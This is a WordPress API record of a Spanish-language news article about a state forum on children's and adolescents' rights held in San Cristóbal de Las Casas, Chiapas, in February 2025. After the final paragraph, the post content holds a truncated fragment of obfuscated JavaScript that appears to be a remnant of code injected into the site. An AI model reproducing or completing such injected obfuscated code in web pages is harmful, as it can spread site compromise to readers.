{"id":20347,"date":"2025-02-13T04:24:10","date_gmt":"2025-02-13T04:24:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20347"},"modified":"2025-02-13T04:24:11","modified_gmt":"2025-02-13T04:24:11","slug":"se-lleva-a-cabo-el-foro-estatal-republica-de-y-para-la-ninez-y-adolescencia-chiapas-2025-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20347","title":{"rendered":"Se lleva a cabo el \u201cForo Estatal Rep\u00fablica de y para la Ni\u00f1ez y Adolescencia Chiapas 2025\u201d en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250212-WA0014-1024x682.jpg\" alt=\"\" class=\"wp-image-20348\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250212-WA0014-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250212-WA0014-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250212-WA0014-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250212-WA0014-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250212-WA0014.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 12 de febrero de 2025.- San Crist\u00f3bal de Las Casas fue sede del \u201cForo Estatal Rep\u00fablica de y para la Ni\u00f1ez y Adolescencia Chiapas 2025\u201d, un espacio de di\u00e1logo y construcci\u00f3n de pol\u00edticas p\u00fablicas enfocadas en garantizar el bienestar y desarrollo de la infancia y adolescencia en el estado.<\/p>\n\n\n\n<p>Durante su participaci\u00f3n, la presidenta municipal, Mtra. Fabiola Ricci Diestel destac\u00f3 la importancia de asumir con firmeza la responsabilidad de apoyar y respaldar a las ni\u00f1as, ni\u00f1os y adolescentes, trabajando en conjunto sociedad y gobierno. \u201cNo se trata solo de buenas intenciones, sino de garantizar un futuro digno para nuestra ni\u00f1ez. Hoy contamos con una Presidenta de la Rep\u00fablica, la Dra. Claudia Sheinbaum Pardo, comprometida con la infancia de M\u00e9xico, y con un Gobernador, Dr. Eduardo Ram\u00edrez Aguilar, que ha demostrado su compromiso con Chiapas\u201d.<\/p>\n\n\n\n<p>Por su parte, la secretaria ejecutiva del Sistema Nacional de Protecci\u00f3n Integral de Ni\u00f1as, Ni\u00f1os y Adolescentes (SIPINNA), Silvia Lorena Villavicencio Ayala, resalt\u00f3 que uno de los principales retos es colocar a la ni\u00f1ez y adolescencia en el centro de las pol\u00edticas p\u00fablicas.<\/p>\n\n\n\n<p>Destac\u00f3 que en M\u00e9xico hay m\u00e1s de 38 millones de ni\u00f1as, ni\u00f1os y adolescentes, lo que representa el 30% de la poblaci\u00f3n, mientras que en Chiapas la cifra asciende a 2.4 millones. \u201cUno de los grandes desaf\u00edos es erradicar la pobreza, como lo ha planteado la presidenta Sheinbaum desde el inicio de su gesti\u00f3n\u201d.<\/p>\n\n\n\n<p>En su intervenci\u00f3n, el gobernador de Chiapas, Dr. Eduardo Ram\u00edrez Aguilar, subray\u00f3 que la ni\u00f1ez y adolescencia ocupan un lugar prioritario en la agenda de su gobierno, con el objetivo de garantizar su derecho a la educaci\u00f3n, protecci\u00f3n e inclusi\u00f3n social. \u201cEs fundamental aprender a escuchar y expresarse con respeto e identidad propia. No deben callar ante cualquier situaci\u00f3n de violencia en la escuela o el hogar. Su derecho principal es estudiar y ser felices\u201d.<\/p>\n\n\n\n<p>Asimismo, Ram\u00edrez Aguilar anunci\u00f3 que con el respaldo del gobierno federal se otorgar\u00e1n becas y apoyos educativos, incluyendo la entrega de \u00fatiles escolares para estudiantes de preescolar a secundaria.<\/p>\n\n\n\n<p>En el evento estuvieron presentes diversas autoridades estatales y municipales, entre ellas la secretaria general de Gobierno, Patricia del Carmen Conde Ruiz; la directora general del DIF Chiapas, Ana Isabel Granda Gonz\u00e1lez; el secretario de Salud, Omar G\u00f3mez Cruz; la secretaria ejecutiva del SIPINNA Chiapas, Floralma G\u00f3mez Santiz; y la titular del Centro Estatal de Prevenci\u00f3n Social y Participaci\u00f3n Ciudadana, Yolanda Alfaro P\u00e9rez.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. San Crist\u00f3bal de Las Casas, 12 de febrero de 2025.- San Crist\u00f3bal de Las Casas fue sede del \u201cForo Estatal Rep\u00fablica de y para la Ni\u00f1ez y Adolescencia Chiapas 2025\u201d, un espacio de di\u00e1logo y construcci\u00f3n de pol\u00edticas p\u00fablicas enfocadas en garantizar el bienestar y desarrollo de la infancia y adolescencia en el estado. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20348,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-20347","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20347","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20347"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20347\/revisions"}],"predecessor-version":[{"id":20349,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20347\/revisions\/20349"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20348"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20347"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20347"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20347"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}